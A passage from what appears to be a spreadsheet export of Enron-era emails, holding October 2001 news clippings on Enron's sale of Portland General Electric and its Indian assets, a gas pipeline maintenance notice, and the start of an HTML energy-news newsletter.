In the aftermath of that deal's collapse, industry sources said Britain's Scottish Power Plc , which owns another Oregon-based utility PacifiCorp, had also held talks to buy Portland._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Enron in talks to sell Portland General to Northwest Natural - report_x000D_
_x000D_
10/05/2001_x000D_
AFX News_x000D_
(c) 2001 by AFP-Extel News Ltd_x000D_
_x000D_
NEW YORK (AFX) - Enron Corp is in advanced discussions to sell its Portland General Electric utility unit to Northwest Natural Gas Co for about 1.8 bln usd in cash and stock, the Wall Street Journal reported, citing people familiar with the matter. _x000D_
The highly leveraged transaction, under which Northwest Natural is also expected to assume roughly 1 bln usd in debt, would eventually give Enron a minority stake in Northwest._x000D_
The discussions are at a very delicate stage. The current environment could make financing such a transaction quite difficult, and board approval is not a certainty. _x000D_
But should the two sides agree to terms, a deal could be announced in the next few days, the Journal said. _x000D_
Enron and Northwest Natural declined to comment. _x000D_
jms For more information and to contact AFX: www.afxnews.com and www.afxpress.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Enron Considers Selling Utility Unit to Northwest Natural for $1.8 Billion_x000D_
_x000D_
10/05/2001_x000D_
Dow Jones Business News_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
Enron Corp. is in advanced discussions to sell its Portland General Electric utility unit to Northwest Natural Gas Co. for about $1.8 billion in cash and stock in a highly leveraged transaction that would eventually give Enron a minority stake in Northwest, people familiar with the matter told The Wall Street Journal. _x000D_
The discussions are at a very delicate stage, and some important points need to be finalized, these people caution. The current environment could also make financing such a transaction quite difficult, and board approval isn't a certainty. However, should the two sides agree to terms, a deal could be announced in the next few days. Northwest Natural (NWN) is also expected to assume roughly $1 billion in debt._x000D_
Enron (ENE) and Northwest Natural declined to comment. _x000D_
If a transaction is consummated, it would come nearly six months after the collapse of Enron's agreement to sell the utility to Sierra Pacific Resources. That transaction fell apart in part because of the California energy crisis. _x000D_
A purchase of Portland General would be a very big bite for Northwest Natural, which has a market capitalization of just $650 million and supplies natural gas to more than 500,000 residential and business customers in Oregon and Vancouver, Wash. Portland General is an electric utility serving more than 1.4 million customers in Oregon. _x000D_
The deal would bring together two Oregon utilities whose executives and employees know each other well. Richard G. Reiten, Northwest's chairman and chief executive, was president and chief operating officer of Portland General between 1989 and 1996, and also served on its board. _x000D_
By buying a utility, Northwest would hope to have more bargaining power in its gas purchases, enabling it to buy more product and store it when prices are cheap. A deal would be accretive to Northwest's earnings, people familiar with the matter say. And the financial risk for Northwest Natural is somewhat muted because Enron is helping to facilitate and finance the transaction by agreeing to take common stock and convertible preferred stock in Northwest Natural in addition to cash. Northwest Natural would finance the transaction with debt and equity offerings. _x000D_
For Enron, a deal with Northwest Natural would be the latest twist in a five-year ordeal that was supposed to help the nation's biggest energy trader break into California's deregulating electricity market. But the utility business proved less valuable than anticipated when Enron was prevented from selling off utility contracts that enabled it to buy electricity cheaply. And California's market developed serious problems last year that made it a less attractive place for Enron to do business. _x000D_
Shares of Northwest Natural were trading up $1.04 at $25.99 in 4 p.m. composite trading on the New York Stock Exchange, while Enron stock was down 39 cents a share at $33.10. _x000D_
Copyright (c) 2001 Dow Jones &amp; Company, Inc. _x000D_
All Rights Reserved._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Enron May Sell Portland for $2.8 Billion, WSJ Says (Update3)_x000D_
2001-10-05 06:34 (New York)_x000D_
_x000D_
Enron May Sell Portland for $2.8 Billion, WSJ Says (Update3)_x000D_
_x000D_
     (Adds sale of oil field in India in sixth paragraph.)_x000D_
_x000D_
     Houston, Oct. 5 (Bloomberg) -- Enron Corp., the largest_x000D_
energy trader, is in advanced talks to sell its Portland General_x000D_
Electric utility unit to Northwest Natural Gas Co. for about $2.8_x000D_
billion in cash, stock and assumed debt, the Wall Street Journal_x000D_
said, citing unidentified people familiar with the matter._x000D_
_x000D_
     Houston-based Enron ``is getting close to another_x000D_
transaction'' involving Portland General, Chief Executive Kenneth_x000D_
Lay said at a conference in New York last month. Enron spokesman_x000D_
Mark Palmer wasn't immediately available to comment._x000D_
_x000D_
     Enron has been trying to sell the utility for more than a_x000D_
year as it focuses on trading. A $3.1 billion sale to Sierra_x000D_
Pacific Resources collapsed in April because the California power_x000D_
crisis made it hard to win approval. Northwest Natural Gas serves_x000D_
more than half a million Oregon and Washington residents._x000D_
_x000D_
     Enron shares declined as much as 2.5 euros, or 6.6 percent,_x000D_
35.5 ($33) in Germany. They've have fallen 60 percent this year_x000D_
and dropped 1.2 percent to $33.10 in U.S. trading yesterday._x000D_
_x000D_
     Some terms of the transaction, which includes about $1.5_x000D_
billion in assumed debt, still need to be completed, the newspaper_x000D_
said. An agreement on the sale of the Portland, Oregon-based_x000D_
utility may be announced in the next few days, the Journal said._x000D_
_x000D_
                          Shift in Focus_x000D_
_x000D_
     Enron earlier this week agreed to sell oil and natural-gas_x000D_
fields in India to U.K.'s BG Group Plc for $388 million as it_x000D_
moves away from owning assets such as power plants and pipelines_x000D_
to concentrate on trading and brokering energy and other_x000D_
commodities._x000D_
_x000D_
     At a price of $2.8 billion, Portland General would fetch 1.2_x000D_
times sales for Enron, less than the average of four times revenue_x000D_
paid for U.S. utilities this year, Bloomberg data show._x000D_
_x000D_
     Mergers and acquisitions in the energy industry surged at the_x000D_
start of the year as electricity and natural-gas prices reached a_x000D_
record high. Since then, prices of power and gas have slumped, in_x000D_
turn deterring companies from making purchases._x000D_
_x000D_
     U.S. natural-gas prices, after reaching a record high at the_x000D_
end of last year, have since plunged 76 percent to $2.413 for each_x000D_
million British thermal units on the New York Mercantile Exchange._x000D_
_x000D_
     Portland General, which Enron bought in 1997 as a platform to_x000D_
sell power into California's deregulating market, has 725,027_x000D_
customers in 51 cities, according to the company's Web site._x000D_
Portland, Oregon-based Northwest Natural said in July second-_x000D_
quarter profit more than doubled to $4.3 million amid cooler_x000D_
weather and customer growth._x000D_
_x000D_
_x000D_
USA: Northwest Natural increases quarterly common div._x000D_
_x000D_
10/05/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
PORTLAND, Ore., Oct 5 (Reuters) - Northwest Natural Gas Co. , a utility serving Oregon and Washington, on Friday said its board has increased the company's quarterly dividend on its common stock to 31.5 cents from 31 cents a share. _x000D_
All dividends, including regular quarterly dividends on the company's outstanding series of preferred and preference stock, will be paid Nov 15 to shareholders of record on Oct 31, Northwest Natural said in a statement._x000D_
Chairman and Chief Executive Richard Reiten said the higher dividend is supported by the company's positive financial outlook including solid customer growth, additional earnings potential from the natural gas storage and electric generation markets, and continuing cost savings. _x000D_
The Wall Street Journal's online edition, citing people familiar with the matter, reported on Friday that energy group Enron Corp. is in advanced talks to sell its Oregon-based Portland General utility to Northwest Natural for $1.8 billion. _x000D_
A spokesman for Northwest Natural, which serves about 530,000 customers in western Oregon and southwest Washington, could not be immediately reached for comment. _x000D_
Shares of Northwest Natural climbed $1.04, or 4.17 percent, to $25.99 on Thursday._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Oct. 5, 2001_x000D_
Houston Chronicle_x000D_
Briefs: City &amp; State _x000D_
Enron to eliminate 500 jobs in Europe_x000D_
LONDON -- Enron Corp. plans to cut 500 jobs in Europe, about 10 percent of its work force there, according to the company's chief executive in Europe, John Sherriff. _x000D_
The cuts are the first significant retrenchment by Houston-based Enron since it arrived in Europe in 1989. Enron has been the most aggressive U.S. energy company to expand into Europe's deregulating markets, but its core energy trading businesses have been held back by the slow progress toward market liberalization in the European Union. _x000D_
_x000D_
_x000D_
_x000D_
UK's BG Says Purchase Of Enron India Assets In Jeopardy_x000D_
_x000D_
10/05/2001_x000D_
Dow Jones International News_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
LONDON -(Dow Jones)- U.K. oil and gas company BG Group PLC (BRG) Friday said a disagreement has broken out that threatens to scuttle its $388 million acquisition of the Indian upstream assets of Enron Corp. (ENE), the U.S. energy group. _x000D_
Company spokesperson Nicole McMahon said BG's goal of acquiring Enron's operatorship of the offshore Tapti gas field and the Panna/Mukti oil and gas field was being challenged by the fields' two other partners - state-owned Oil &amp; Natural Gas Corp. (P.ONG) and Reliance Industries Ltd.(P.REL) - which jointly hold a 70% stake in the assets._x000D_
The Indian government wants ONGC and Reliance to have first option on operatorship, which was being pursued by both companies, an Indian newspaper reported Friday. _x000D_
When the transaction was announced Wednesday, BG made it clear it would walk away from the deal if it didn't get outright operatorship. _x000D_
McMahon said negotiations are continuing with ONGC and Reliance who "have both expressed interest in being the operator of both fields." _x000D_
"We believe we have the relevant skills and experience to be the operator," she said. She didn't, however, confirm that BG will pull out of the deal if didn't inherit Enron's operatorship of both Tapti and Panna/Mukti fields, located off India's west coast. _x000D_
"We would have to assess the reasons and the outcomes and consider our options," she said _x000D_
She said a decision will be made by the end of October. _x000D_
BG has portrayed the purchase of Enron Oil and Gas Ltd., or EOGIL, as significant, both boosting the group's global hydrocarbon production by up to 7%, and diversifying its distribution and pipeline interests in the fast-growing Indian energy market. _x000D_
About 1018 GMT, BG Group shares were flat at 272.75 pence. _x000D_
-By Michael Wang, Dow Jones Newswires; +44-20-7842-9386; michael.wang@dowjones.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
INDIA PRESS: Enron Offshore Field Sale To BG May Fail_x000D_
_x000D_
10/05/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
NEW DELHI -(Dow Jones)- U.S.-based Enron Corp.'s (ENE) plan to sell its 30% stake in two offshore oil and natural gas fields to British Gas India Pvt. Ltd. may fall through, the Economic Times reports. _x000D_
British Gas India is a unit of U.K.-based oil and natural gas company BG Group PLC (BRG)._x000D_
According to the report, the Indian government has made it clear that the existing equity holders - Oil &amp; Natural Gas Corp. (P.ONG) and Reliance Industries Ltd. (P.REL) - will have the option to decide on the operatorship of the field once Enron exits. _x000D_
ONGC and Reliance together hold a 70% stake in the joint venture exploration project and have claimed operatorship rights over the Panna-Mukta and Tapti oil and gas fields located in India's western coast. _x000D_
But British Gas India, which Wednesday announced its plans to take over Enron's offshore interests for $388 million, has made it clear that the deal would fall through if it didn't get the operatorship. _x000D_
"The governments role is restricted to that of a facilitator. Enron has written to us regarding their decision to exit and the new deal struck with British Gas," the report says, quoted India's Petroleum and Natural Gas Minister Ram Naik. _x000D_
"However, it is for ONGC and Reliance who are existing equity holders to take a decision on the operatorship," Naik said. _x000D_
Naik said BG and Enron have struck the deal keeping in mind the existing condition and the possible consequences. "It is for them to find a solution," Naik said, according to the report. _x000D_
Newspaper Web site: www.economictimes.com _x000D_
_x000D_
-By Himendra Kumar; Dow Jones Newswires; 91-11-461-9426; himendra.kumar@dowjones.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
British Gas unlikely to get operatorship_x000D_
_x000D_
10/05/2001_x000D_
Financial Express_x000D_
Copyright (C) 2001 Indian Express Newspapers (Bombay) Ltd.; Source: World Reporter (TM)_x000D_
_x000D_
New Delhi, Oct 4: BRITISH Gas, which has bought Enrons stake in Panna-Mukta-Tapti oil and gas fields for a consideration of $388 million, is unlikely to get operatorship rights of the Panna, Mukta and Tapti oil and gas fields. _x000D_
The whole deal may then fall apart as transfer of the operatorship rights for these fields was set as a major condition precedent by British Gas for acquiring Enrons 30 per cent stake in the oil venture._x000D_
Speaking to newspersons, petroleum minister Ram Naik said that British Gas would not have the first claim of becoming operator of Panna-Mukta-Tapti fields by just buying out Enrons stake. Enron is one of the partners in the in the joint venture oil property along _x000D_
with Reliance Industries and _x000D_
Oil and Natural Gas Corporation (ONGC). _x000D_
\"Even before the deal was clinched, all the three joint venture partners i.e., ONGC, Reliance and Enron had entered into an agreement according to which, if the operator company quits the _x000D_
joint venture, the first right of refusal lies with the other two partners. _x000D_
Therefore, the option of becoming operator in the oil property is with the remaining two partners in the joint venture,\" Mr Naik said. _x000D_
British Gas India CEO Nigel Shaw told The Financial Express that the company would not accept anything short of full operatorship right. On being asked whether rotatory operatorship would be acceptable to the company, he said, \"No. It is too messy.\" _x000D_
Mr Shaw had stated on Wednesday that the deal with Enron, to be transacted by October end, would fall through if it was not given the operatorship of these oil and gas field. _x000D_
Mr Naik said that ONGC, which holds a 40-per cent stake in these fields had staked its claims in these fields much before the deal was sealed between Enron and British Gas. _x000D_
Asked on the role of the government in the controversy, Mr Naik said that the Centre will act as a facilitator to help the joint venture companies reach an agreement._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
INDIA: India Tata to finalise Enron bid in 3 wks - papers._x000D_
_x000D_
10/05/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
BOMBAY, Oct 5 (Reuters) - India's Tata Power Co will finalise a bid in three weeks for U.S. energy giant Enron Corp's 65-percent stake in troubled Dabhol Power Co, newspapers said on Friday. _x000D_
Officials at Tata Power , India's largest private utility, were not immediately available for comment._x000D_
Earlier this week, Tata managing director Adi Engineer told Reuters the company was in preliminary talks to buy Enron's controlling stake in Dabhol Power, which runs a $2.9 billion power project on India's west coast. _x000D_
A Dabhol spokesman said he had no comment. _x000D_
Dabhol's 740-MW generator in Maharashtra has been shut since June after its sole buyer, a loss-making local utility, stopped purchasing power and defaulted on payments. _x000D_
Enron then stopped work on a near-complete second phase generation unit that would have increased production capacity to 2,184 MW. _x000D_
The Financial Express said Indian lenders, who have an exposure of $1.4 billion to the project, will also finalise a revival package in three weeks. _x000D_
On Thursday representatives from the Industrial Development Bank of India (IDBI) , the largest lender to the project, met finance ministry officials. _x000D_
Tata Power shares were down 3.16 percent at 93.60 rupees in early afternoon trade while the Bombay index was off 0.27 percent. _x000D_
The Hindu Business Line said the government had agreed in principle to a set of concessions suggested by the lenders to make the project viable. _x000D_
It said these included allotting special distribution zones which would buy at least half the power generated by the project's 1,444 MW second phase. _x000D_
The daily said this would involve ending the state-owned National Thermal Power Corporation's 1,400 MW sale of power to Maharashtra._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
INDIA PRESS: BSES Won't Buy Enron's Stake In Dabhol_x000D_
_x000D_
10/05/2001_x000D_
Dow Jones International News_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
NEW DELHI -(Dow Jones)- India's BSES Ltd. (P.BSX) won't buy U.S. energy company Enron Corp.'s (ENE) 65% stake in Dabhol Power Co., reports the Business Standard. _x000D_
BSES told the Bombay Stock Exchange it has no interest in the 2,184-megawatt Dabhol due to the "uneconomical parameters of the project," the newspaper said._x000D_
Costing $2.9 billion, Dabhol, located in the western Indian state of Maharashtra, is the single largest foreign investment in India to date. Newspaper Web site: www.business-standard.com _x000D_
_x000D_
-By Himendra Kumar; Dow Jones Newswires; 91-11-461-9426; himendra.kumar@dowjones.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Tata Power seeks 3 weeks to firm up Dabhol offer_x000D_
Our Economy Bureau NEW DELHI_x000D_
_x000D_
10/05/2001_x000D_
Business Standard_x000D_
1_x000D_
Copyright (c) Business Standard_x000D_
_x000D_
Tata Power is expected to firm up its offer for buying foreign equity in Dabhol Power Company in three weeks. _x000D_
The Indian lenders to the project, which will meet the Centre after three weeks, have asked for a heavy discount on the equity besides several concessions for taking over the $2.9 billion power project, government officials said._x000D_
Tata Power had earlier informed the lenders that it would require four weeks from the time discussions were initiated with Enron for buying its equity in Dabhol. _x000D_
At a meeting with the finance and power ministry officials here today, Indian financial institutions led by Industrial Development Bank of India (IDBI) said that payment by the prospective buyer for 85 per cent held by Enron, GE and Bechtel be made in instalments. _x000D_
Enron had earlier proposed to sell the foreign equity to domestic lenders in three instalments of 40 per cent, 50 per cent and 10 per cent extending up to January 1, 2003. Indian institutions have an exposure of over Rs 6,000 crore to the 2,184 mega watt project. _x000D_
Indian lenders have said that the dispute between all the stakeholders should be resolved before the sale of foreign equity. They have also suggested that the new promoter be provided relief like lowering the interest rate on borrowings, according DPC mega power project status and tax concessions. IDBI chairman PP Vora said after the three-hour long meeting that the lenders have been asked to explore alternatives and revert to the Centre after three weeks. Sources said that during the period, Indian lenders would prepare the roadmap for revival of the project. Negotiations with other possible suitors would also be initiated, they added. _x000D_
The institutions have said that the sale of equity be directly negotiated between Enron and the prospective buyers. While BSES has finally decided not to go ahead with its plans to take over DPC, National Thermal Power Corporation has said the project was not economically viable for it. Akin to Godbole Committee recommendations, the institutions have also recommended conversion of dollar-denominated debt to rupee loans to prevent tariff escalation. With DPC having already initiated arbitration proceedings against Maharashtra State Electricity Board (MSEB), the Indian lenders would also look at the legality of sale while the issue was sub-judice. _x000D_
Today's meeting, convened by finance secretary Ajit Kumar, was attended by power secretary A K Basu, Vora and other senior executives from IDBI, ICICI, IDFC and State Bank of India apart from government officials._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Tata Power, Enron set for time-bound talks on DPC stake sale_x000D_
_x000D_
10/05/2001_x000D_
Financial Express_x000D_
Copyright (C) 2001 Indian Express Newspapers (Bombay) Ltd.; Source: World Reporter (TM)_x000D_
_x000D_
Mumbai, Sept 28: Tata Power and Enron are understood to be close to an agreement on entering into time-bound negotiations for Tata Power to buy Enrons stake in the troubled Dabhol Power Company (DPC). A time-frame is being talked about in this connection, wherein no other party would be talked to and discussions would take place only between the two sides. _x000D_
Industry sources said the Industrial Development Bank of India (IDBI), which is acting as a major facilitator to the stake sale, is a key player in the agreement between Tata Power and Enron. Discussions on the sale of the equity would directly take place between Tata Power and Enron, the sources said._x000D_
Tata Power managing director Adi Engineer confirmed his meeting with the Enron India managing director K Wade Cline in the presence of IDBI chairman PP Vora on Thursday. "We have had a preliminary meeting where both the parties were apprised of the situation. We will have to wait for further developments," he added. _x000D_
According to sources, a time-bound agreement between Enron and Tata Power would provide an easy access to the various deals which Enron had struck at the time of commencment of work on the 2,184 mw Dabhol project. Tata Power would have to look into over 500 documents related to the Dabhol project and do the due deligence before giving a concrete offer to Enron. _x000D_
Tata Power, in a bid to expand its presence across the state, is also keen to hold hard, bargaining over the "acceptable" tariff of the project which would have to be restructured. Investment banking major JM Morgan Stanley, which is understood to be advising the Tatas on the deal, has already swung into action and has started collecting necessary back-up information from various sources including the Maharashtra State Electricity Board, for Tata Power. _x000D_
While no comment was available from Enron on the issue, financial institution sources said: "Tata Power is interested in talks. It is a good thing if things work out between the two sides." JM Morgan boss Nimesh Kampani had no comments to offer to The Financial Express when asked about the developments. _x000D_
The FIs, led by IDBI, had been keen that they would play the role of facilitator in the sale of the Enron stake in DPC, since huge sums of money are stuck in the project for the borrowers. While even BSES Ltd was being mentioned earlier as one of the contenders, the company does not seem inclined to proceed with it now. That leaves Tata Power as the chief contender for the stake sale. _x000D_
The FIs are also expected to play a role in roping in a partner for the LNG facility which is to be hived off. The names of some of the gas majors like British Gas, BP, Shell, Reliance in addition to the state-run Gas Authority of India (Gail) are being mentioned as potential partners in this connection, the sources said. The FIs are clear that any discussion on the LNG facility will have to include the new sponsor of the project._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Moody's Modi on Tata Power Plan to Buy Enron Unit: Comment_x000D_
2001-10-05 06:20 (New York)_x000D_
_x000D_
_x000D_
     Mumbai, Oct. 5 (Bloomberg) -- Chetan Modi, an analyst with_x000D_
Moody's Investor's Services in London, speaks on plans by Tata_x000D_
Power Ltd. to bid for Enron Corp's India unit, Dabhol Power Co._x000D_
_x000D_
     Tata Power is India's biggest power producer and has bonds_x000D_
worth $240 million trading overseas. The bonds are rated at two_x000D_
levels below investment grade by Moody's, at ``Ba2'' or same as_x000D_
the country's sovereign rating._x000D_
_x000D_
     ``Its inevitable for Tata Power to be interested in buying_x000D_
Dabhol. Power is their core business and they have the expertise._x000D_
I'd be surprised if they weren't interested._x000D_
_x000D_
     ``Tata Power management told us they've indicated an interest_x000D_
but have had no formal discussions with Enron._x000D_
_x000D_
     ``We will look at the deal holistically if -- and that's a_x000D_
big if -- Tata decides to buy Dabhol and its impl</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 01:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'christine.stokes@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'eileen.peebles@enron.com', 'jeffery.fawcett@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com', 'jo.williams@enron.com'})</t>
  </si>
  <si>
    <t>3 Maintenance Notes</t>
  </si>
  <si>
    <t xml:space="preserve">In a letter last month (see Daily GPI, Oct. 19), Northwest announced a policy _x000D_
revision allowing a shipper holding capacity from Sumas to off-system _x000D_
delivery points to amend primary delivery points and shorten the path without _x000D_
being subject to a contractual OFO upon extending its contract term. However, _x000D_
citing "the current OFO situation on the pipeline system," Northwest said _x000D_
last week the policy change is under review and has been suspended until _x000D_
further notice. _x000D_
_x000D_
_x000D_
El Paso reported Thursday an injection unit at its Washington Ranch storage _x000D_
facility had gone down for emergency maintenance. Capacity through Pecos _x000D_
River Station has been reduced by 100 MMcf/d until further notice, causing _x000D_
the pipeline to impose allocations on Permian Basin production and deliveries _x000D_
of San Juan Basin gas to the South Mainline. _x000D_
_x000D_
_x000D_
El Paso said work on Lines 1106 and 1107 was extended by one more day, _x000D_
causing the shut-in of deliveries into El Paso at the IUTBENED and IHYBENDM _x000D_
interconnects to continue through Dec. 1. The delay also postpones scheduled _x000D_
work on Line 3137, which now will be shut in Dec. 4-5, affecting the _x000D_
IVALEROZ, ISONORA, ISHOZONA and IBARNHRT points. Line 3177 is scheduled for _x000D_
Dec. 7 inspection, affecting IMOBILPE. _x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 14:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ecenter@williams.com'})</t>
  </si>
  <si>
    <t>frozenset({'enl-members-html@estutenws11.energy.williams.com'})</t>
  </si>
  <si>
    <t>Williams Energy News Live -- today's video newscast</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=iso-8859-1"&gt;_x000D_
&lt;html&gt;&lt;head&gt; _x000D_
&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;_x000D_
_x000D_
_x000D_
&lt;title&gt;Energy News Live Daily Wrap-Up&lt;/title&gt; _x000D_
_x000D_
&lt;/head&gt; _x000D_
_x000D_
&lt;body bgcolor="#FFFFFF" link="#0000ff" alink="#0000ff" vlink="#0000ff" _x000D_
topmargin=0 leftmargin=0 marginheight=0 marginwidth=0&gt; _x000D_
&lt;img_x000D_
src="http://www.energynewslive.com/ImageLogServlet/content/email/graphic_x000D_
s/header.jpg?email=Mike.Grigsby@enron.com" width="600" height="95"&gt;_x000D_
&lt;br&gt; _x000D_
&lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt; _x000D_
  &lt;tr&gt; _x000D_
    &lt;td width="45"&gt;&amp;nbsp;&lt;/td&gt; _x000D_
    &lt;td width="5"&gt;&amp;nbsp;&lt;/td&gt; _x000D_
    &lt;td width="500"&gt; _x000D_
        &lt;font face="verdana,arial,helvetica" size=-1&gt; _x000D_
      &lt;p&gt;Dear Mike,&lt;/p&gt; _x000D_
&lt;!-- This mail was sent to "Mike Grigsby" &lt;Mike.Grigsby@enron.com&gt;, who belongs to_x000D_
list enl-members-html --&gt;_x000D_
&lt;!-- CONTENT START --&gt;_x000D_
&lt;p&gt;&lt;b&gt;Solar and wind power&lt;/b&gt; have long been used as renewable sources_x000D_
of energy.  On Wednesday, we'll have a report on an interesting_x000D_
&lt;b&gt;alternative to these renewables&lt;/b&gt;.  ENL's Gale Smith will tell us_x000D_
about a &lt;b&gt;Louisiana company&lt;/b&gt; that is using &lt;b&gt;rice hulls to produce_x000D_
electricity&lt;/b&gt;.  Catch Gale's report from Houston tomorrow._x000D_
&lt;p&gt;The &lt;b&gt;Enron/Dynegy negotiations&lt;/b&gt; continue and Gale tells me the_x000D_
Houston bureau is keeping close tabs on all developments._x000D_
&lt;p&gt;&lt;b&gt;Standard &amp; Poor's Ratings Services' David Hitchcock&lt;/b&gt; will talk_x000D_
to ENL's Kym McNicholas Wednesday about &lt;b&gt;California's current credit_x000D_
rating&lt;/b&gt;.  The state is set to issue a proposed $12.5 billion in_x000D_
revenue bonds and Hitchcock will discuss &lt;b&gt;whether renegotiating_x000D_
California's long-term power contracts could delay the process&lt;/b&gt;.  _x000D_
&lt;p&gt;Kym will also speak with the &lt;b&gt;Executive Director of the California_x000D_
Natural Gas Producers Association John Martini&lt;/b&gt;.  He'll address the_x000D_
unspecified &lt;b&gt;threats to U.S. pipelines&lt;/b&gt;.  Watch for those details_x000D_
from the West Coast bureau on Wednesday._x000D_
&lt;p&gt;We'll have an interview from the Chicago Mercantile Exchange on_x000D_
Wednesday.  &lt;b&gt;Alaron Trading Vice President Phil Flynn&lt;/b&gt; will join us_x000D_
to discuss the &lt;b&gt;API and DOE&lt;/b&gt; numbers and tell us what's going on_x000D_
with the &lt;b&gt;brewing OPEC price war&lt;/b&gt;.  We'll hear from Flynn during_x000D_
the noon ET newscast tomorrow._x000D_
&lt;p&gt;&lt;table cellpadding=1 cellspacing=0 border=1 bordercolor="#000000"_x000D_
width=300&gt;_x000D_
&lt;tr bgcolor="#cccccc"&gt;&lt;td align=center&gt;&lt;font color="#000000"_x000D_
face="verdana,arial,helvetica" size=-1&gt;&lt;b&gt;Closing_x000D_
Prices for Tuesday, Nov. 27, 2001&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
&lt;tr&gt;&lt;td align=left&gt;_x000D_
	&lt;table cellspacing=2 cellpadding=0 border=0&gt;_x000D_
		&lt;!--&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left width=100&gt;Commodity:&lt;/td&gt;_x000D_
			&lt;td align=right width=75&gt;Close Price&lt;/td&gt;_x000D_
			&lt;td align=right width=100&gt;Change_x000D_
Price&lt;/td&gt;&lt;/tr&gt;--&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left width=100&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Crude:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left width=75&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$19.48&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left width=100&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;+$0.79&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Unleaded:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$0.5381&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;+$0.0164&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Heating&amp;nbsp;Oil:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$0.5394&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;+$0.0177&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td width=5&gt;&amp;nbsp;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;Natural&amp;nbsp;Gas:&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;$2.606&lt;/font&gt;&lt;/td&gt;_x000D_
			&lt;td align=left&gt;&lt;font_x000D_
face="verdana,arial,helvetica" size=-1&gt;-$0.09&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
	&lt;/table&gt;_x000D_
&lt;/td&gt;&lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;p&gt;We'll have &lt;b&gt;live coverage from Anchorage, Alaska&lt;/b&gt; on Thursday._x000D_
Houston Correspondent Kim Benestante is covering &lt;b&gt;"Alaska Resources_x000D_
2002: Can Alaska Compete?"&lt;/b&gt;  Catch reports from Anchorage on_x000D_
Thursday._x000D_
&lt;p&gt;Also on Thursday, ENL's Gale Smith will attend the &lt;b&gt;Arctic Gas_x000D_
